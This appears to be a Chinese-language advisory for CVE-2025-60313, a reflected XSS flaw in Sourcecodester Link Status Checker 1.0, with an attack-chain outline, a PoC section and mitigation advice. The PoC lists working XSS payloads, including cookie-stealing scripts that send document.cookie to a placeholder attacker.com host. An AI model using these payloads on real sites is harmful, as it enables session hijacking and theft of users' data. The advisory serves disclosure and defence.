CVE-2025-60313：Sourcecodester Link Status Checker 1.0 XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60313

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sourcecodester Link Status Checker 1.0

漏洞概述

CVE-2025-60313是Sourcecodester Link Status Checker 1.0中存在的一个跨站脚本（XSS）漏洞。该漏洞于2025年10月8日由MITRE组织披露，CVSS 3.1评分为6.1，属于中危级别漏洞。Link Status Checker是一款基于PHP和JavaScript开发的链接状态检测工具，允许用户输入多个URL并检查其可达性。然而，该应用在"Enter URLs to check"输入字段处未对用户提交的数据进行充分的输入验证和输出编码，导致恶意攻击者可以通过构造特殊的输入内容注入恶意脚本代码。当受害者浏览包含恶意脚本的页面或点击攻击者精心构造的链接时，嵌入的JavaScript代码将在受害者的浏览器上下文中执行，从而实现会话劫持、敏感信息窃取、钓鱼攻击或恶意重定向等危害。该漏洞的CVSS向量表明其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），但需要用户交互（UI:R），影响范围为已更改的组件（S:C），对机密性和完整性有低影响，对可用性无影响。由于该应用通常部署在Web服务器上，面向公网用户提供服务，因此该漏洞具有较高的实际利用风险。

技术细节

该XSS漏洞的根本原因在于Sourcecodester Link Status Checker 1.0的"Enter URLs to check"输入字段未对用户输入进行适当的过滤和转义处理。当用户在URL输入框中提交数据时，应用程序直接将用户输入的内容回显到HTML页面中，而没有进行HTML实体编码（如将<转义为<，将>转义为>等）。攻击者可以利用这一缺陷，在输入字段中注入恶意的JavaScript代码片段，例如使用<script>标签、<img>标签的onerror事件属性或其他HTML标签的事件处理器。当受害者在浏览器中查看包含恶意注入的页面时，浏览器会解析并执行嵌入的恶意脚本。由于该漏洞为反射型XSS（Stored或Reflected类型），攻击者通常需要通过社会工程学手段诱导受害者访问包含恶意payload的URL或页面。攻击payload可以通过URL参数、POST请求体或表单输入进行传递。一旦恶意脚本在受害者浏览器中执行，攻击者便可以窃取用户的会话Cookie、获取敏感表单数据、修改页面内容、进行钓鱼攻击，或利用浏览器的API进一步渗透用户系统。CVSS向量中的S:C（Scope Changed）表明漏洞的影响范围超出了易受攻击的组件本身，可能影响到其他安全上下文。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别部署在公网上的Sourcecodester Link Status Checker 1.0实例，确定目标系统的存在和可访问性。

STEP 2

步骤2：漏洞探测

攻击者访问目标应用的"Enter URLs to check"功能页面，尝试在URL输入字段中输入测试payload（如<script>alert(1)</script>），验证XSS漏洞是否存在。

STEP 3

步骤3：构造恶意Payload

攻击者根据漏洞类型（反射型或存储型）构造恶意JavaScript代码，可能包括会话窃取、键盘记录、钓鱼表单注入或恶意重定向等功能。

STEP 4

步骤4：投递攻击

攻击者通过社会工程学手段（如钓鱼邮件、即时消息或恶意链接）诱导受害者点击包含恶意payload的URL，或在共享页面上注入恶意内容。

STEP 5

步骤5：执行恶意代码

受害者在浏览器中打开包含恶意payload的页面，浏览器解析并执行嵌入的JavaScript代码，攻击者在受害者浏览器上下文中获得执行权限。

STEP 6

步骤6：数据窃取与权限滥用

恶意脚本窃取用户的会话Cookie、敏感信息或执行未授权操作，攻击者利用窃取的凭证进一步访问系统或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-60313: Sourcecodester Link Status Checker 1.0 - Reflected XSS PoC -->
<!-- Vulnerability Location: "Enter URLs to check" input field -->
<!-- Attack Vector: Remote, requires user interaction -->

<!-- Method 1: Direct script injection via URL input field -->
<script>alert('XSS-CVE-2025-60313')</script>

<!-- Method 2: Using img tag with onerror event handler -->
<img src=x onerror=alert(document.cookie)>

<!-- Method 3: Using svg tag with onload event -->
<svg onload=alert('XSS')>

<!-- Method 4: Crafted malicious URL to exploit reflected XSS -->
<!-- URL example: http://target/index.php?url=<script>alert(document.cookie)</script> -->
<!-- Or via POST request body to the URL check form -->

<!-- Full exploit URL pattern: -->
<!-- http://vulnerable-site/link-checker/?urls=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> -->

<!-- Cookie stealing payload example -->
<script>new Image().src="http://attacker.com/steal.php?cookie="+document.cookie;</script>

影响范围

Sourcecodester Link Status Checker 1.0

防御指南

临时缓解措施

在等待官方修复补丁发布之前，建议采取以下临时缓解措施：首先，对"Enter URLs to check"输入字段的所有用户输入实施严格的输入白名单验证，仅允许合法的URL格式字符（如字母、数字、冒号、斜杠、点号、连字符等），拒绝包含<、>、"、'、&、;、(、)、script、onerror等特殊字符或关键字的输入。其次，对所有输出到HTML页面的用户输入使用htmlspecialchars()或类似函数进行HTML实体编码，确保恶意脚本无法被浏览器解析执行。此外，建议立即部署Web应用防火墙（WAF）规则，检测和阻断常见的XSS攻击payload。管理员还应检查Web服务器日志，查找是否存在异常的URL请求或可疑的脚本注入痕迹，评估是否已有攻击者利用该漏洞进行攻击。同时，限制该应用的公网访问范围，仅对可信用户提供服务，降低被攻击的风险。